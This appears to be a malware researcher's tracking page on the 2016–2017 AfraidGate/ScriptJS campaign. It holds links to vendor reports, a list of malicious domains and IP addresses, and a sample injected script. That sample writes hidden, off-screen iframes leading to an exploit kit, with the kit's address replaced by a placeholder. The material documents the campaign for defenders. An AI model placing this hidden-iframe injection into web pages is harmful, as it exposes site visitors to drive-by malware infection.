#ScriptJS/AfraidGate
| Title | Date Here | Source | Comment |
|---|---|---|---|
| Dridex Actors Get In the Ransomware Game With "Locky" | 2016-02-16 | Proofpoint | |
| Locky Ransomware Installed Through Nuclear EK | 2016-03-21 | PaloAlto | |
| Threat Spotlight: Exploit Kit Goes International Hits 150+ Countries | 2016-04-20 | Talos | |
| Highly Popular Anime Site Jkanime Compromised | 2016-06-21 | Forcepoint | |
| Neutrino EK’s Afraidgate pushed in malvertising attack | 2016-09-13 | Malwarebytes | Payload is Godzilla here. Locky is in fact a 2ndStage |
| Fox stealer: another Pony Fork | 2016-09-26 | MalwareDontNeedCoffee |
| Date | Domain | IP |
|---|---|---|
| 170206 | tandem.florenciaespineira.cl | 192.241.246.34 |
| 170204 | torneonis.cattcval.com.ve | 138.197.222.151 |
| 170203 | longtrim.datatestserver.com | 159.203.30.60 |
| 170201 | kithole.seanconnor.com | 159.203.30.60 |
| 170122 | cuprum.poemar.es | 146.185.151.179 |
| 170122 | bombarda.mkoussa.com | 146.185.151.179 |
| 170121 | pistole.1stclassmunitions.com | 146.185.151.179 |
| 170118 | team.motivaplan.com.br | 45.55.10.142 |
| 170110 | malina.cfdiweb.mx | 178.62.242.179 |
| 161214 | alfio.brasilperfectcity.com | 188.166.17.115 |
| 161209 | stylesheet.bittitle.com | 138.68.144.43 |
| 161203 | aquarius.away.es | 138.68.144.43 |
| 161127 | mikkie.thejwfnet.co.uk | 188.166.4.51 |
| 161124 | max.nasasi.com.ar | 159.203.18.229 |
| 161120 | parameter.miafp.cl | 159.203.18.229 |
| 161023 | club.panduan-ngeblog.com | 138.68.135.94 |
| 161015 | round.luc-hariman.com | 159.203.2.200 |
| 161015 | alexa.lorea.io | 159.203.2.200 |
| 161011 | monte.aguero.com.au | 82.196.10.194 |
| 161003 | sp.gridjunky.com | 95.85.46.182 |
| 160930 | spower.gogohen.com | 95.85.46.182 |
| 160928 | aug.nightrelay.co.za | 139.59.171.176 |
| 160927 | monro.nillaraujo.com | 139.59.171.176 |
| 160926 | lesley.portcoquitlamweather.ca | 188.166.66.191 |
| 160923 | mouse.redvos.com | 188.166.66.191 |
| 160922 | rouse.haslhome.com | 46.101.93.53 |
| 160920 | test.linonsa.com | 146.185.158.150 |
| 160919 | van.readytogo.club | 178.62.23.109 |
| 160918 | van.readytogo.club | 178.62.23.109 |
| 160918 | knight.manex.us | 178.62.23.109 |
| 160915 | vk.manex.us | 178.62.23.109 |
| 160908 | note.followthebrowns.com | 159.203.3.186 |
| 160906 | ono.bienestando.cl | 159.203.3.186 |
| 160901 | murphy.tahubaxoku.com | 146.185.172.147 |
| 160828 | ops.latokaski.fi | 138.68.18.73 |
| 160828 | nonna.culturizartechillan.cl | 138.68.18.73 |
| 160818 | font.enriquemonsalve.cl | 178.62.77.103 |
| 160814 | way.minadepreco.com.br | 188.166.54.203 |
| 160814 | make.kankerblogger.com | 188.166.54.203 |
| 160811 | global.platinoviajes.com.ve | 188.166.54.203 |
| 160801 | one.hiiragihoo.com | 139.59.160.138 |
| 160730 | temp.blog-sandltnst.co | 139.59.160.138 |
| 160726 | leon.stmaryschooldmt.com | 46.101.26.161 |
| 160722 | long.revistashine.com.ar | 46.101.26.161 |
| 160713 | stown.katieprallphotography.com | 188.166.38.125 |
| 160629 | dance.jmestudiocontable.com.ar | 139.59.191.79 |
| 160626 | onno.motorgear.com.au | 188.166.38.125 |
| 160626 | dron.transportemorelli.com.ar | 146.185.173.25 |
Script example :
document.write('<div class="" style="position:absolute; width:399px; height:400px; left:15px; top:-740px;"> <a> </a><div> <a class="menu_link_new"></a> strong<iframe src="[EK HERE]" width=255 height=261 ></ifram'+ 'e><a></a></div><a class=""></a></div>');document.write('<div style="position:absolute; width:365px; height:400px; left:10px; top:-475px;"> <a class=""></a><div class="menu-add-name"> <a class="menuaddname"></a> <iframe src="[EK HERE]" width=271 height=278 ></ifram'+'e><a class=""></a></div> </div>');document.write('<div style="position:absolute; width:355px; height:363px; left:10px; top:-954px;"> <a class=""></a><div class="menu-add-name"> <a class="menuaddname"></a> <iframe src="[EK HERE]" width=285 height=290 ></ifram'+'e><a class=""></a></div> </div>');